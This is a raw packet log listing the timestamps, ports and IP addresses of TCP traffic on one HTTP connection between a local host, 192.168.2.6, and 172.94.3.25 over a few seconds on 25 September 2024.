Sep 25, 2024 16:03:29.187072039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187083006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187098026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187108040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187124014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.187124014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.187127113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187206984 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.187357903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187369108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187392950 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.187417030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187427998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187438965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187450886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187467098 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.187467098 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.187524080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.187561035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.265412092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265429974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265443087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265496016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265506983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265506983 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.265518904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265535116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265546083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265594959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.265594959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.265634060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265645027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265666008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265680075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265688896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265700102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.265716076 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.265717030 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.266042948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.275624990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.275680065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.275929928 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.344124079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.344150066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.344161987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.344173908 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.344186068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.344197989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.344208956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.344221115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.344232082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.344235897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.344244003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.344309092 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.344309092 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.354253054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.354281902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.354418993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.422771931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.422789097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.422801971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.422820091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.422832966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.422898054 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.422898054 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.422918081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.422996998 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.423007011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.423018932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.423029900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.423041105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.423051119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.423062086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.423069954 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.423069954 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.423146009 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.432218075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.432241917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.432275057 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.523606062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.523631096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.523643017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.523653984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.523669958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.523682117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.523693085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.523705006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.523715973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.523726940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.523742914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.523816109 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.577388048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.580837965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.580862045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.580874920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.580888033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.580899954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.580910921 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.580919027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.580952883 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.581159115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.581170082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.581181049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.581192017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.581206083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.581208944 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.581217051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.581233978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.581250906 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.581295967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.581306934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.581355095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.658188105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.658210039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.658221006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.658226013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.658334017 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.662919044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.662931919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.662941933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.662954092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.662980080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.663001060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.663059950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.667659044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.667673111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.667690039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.667706966 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.667735100 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:29.667893887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.672365904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:29.672421932 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.567961931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.568006992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.568018913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.568032026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.568099976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.568103075 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.568165064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.568212032 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.568227053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.568238020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.568253994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.568265915 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.568301916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.568336010 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.568361998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.568372011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.568411112 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.646208048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646223068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646244049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646256924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646269083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646317959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.646370888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.646436930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646472931 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.646492958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646503925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646537066 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.646544933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646557093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646586895 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.646662951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646672010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646682978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646696091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646708012 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.646728992 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.646756887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646766901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.646809101 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.656286955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.656347990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.656390905 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.724881887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.724910021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.724932909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.724945068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.724972963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.724984884 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.724996090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.725003004 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.725014925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.725025892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.725035906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.725043058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.725047112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.725058079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.725064039 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.725076914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.725081921 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.725089073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.725100994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.725100994 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.725136042 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.734672070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.734714031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.734740973 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.780519962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.803086996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803111076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803123951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803134918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803148985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803159952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803172112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803201914 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.803263903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.803316116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803328037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803338051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803355932 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.803360939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803373098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803379059 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.803383112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803405046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803411007 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.803442001 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.803508997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803538084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803550005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.803575993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.858743906 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.881884098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.881901979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.881916046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.881980896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.881993055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.882025003 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.882057905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.882066965 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.882071018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.882093906 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.882118940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.882138014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.882149935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.882150888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.882160902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.882180929 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.882191896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.882203102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.882225037 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.891499043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.891541004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.891563892 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.936736107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.960866928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.960896969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.960911989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.960927963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.960942030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.960954905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.960969925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.960969925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.960984945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.960999012 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.961025000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.961184025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.961251020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.961266041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.961311102 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:31.970243931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.970282078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:31.970314980 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.014846087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.038886070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.038929939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.038949013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.038961887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.038969040 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.038971901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.038985014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.039001942 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.039004087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.039009094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.039016008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.039021015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.039043903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.039062977 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.039098978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.039144993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.039156914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.039175987 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.039510012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.039524078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.039535999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.039549112 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.039572001 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.117468119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117486954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117501974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117512941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117526054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117539883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117549896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117598057 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.117650986 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.117815018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117825985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117860079 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.117887020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117899895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117909908 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117923021 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.117923975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.117942095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.171135902 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.195977926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196011066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196024895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196041107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196053028 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196077108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196088076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196099043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196106911 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.196110964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196151972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196162939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196171999 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.196194887 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.196319103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196329117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196346045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.196352959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.196381092 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:32.274497032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274516106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274528980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:32.274543047 CEST	80	49715	172.94.3.25	192.168.2.6
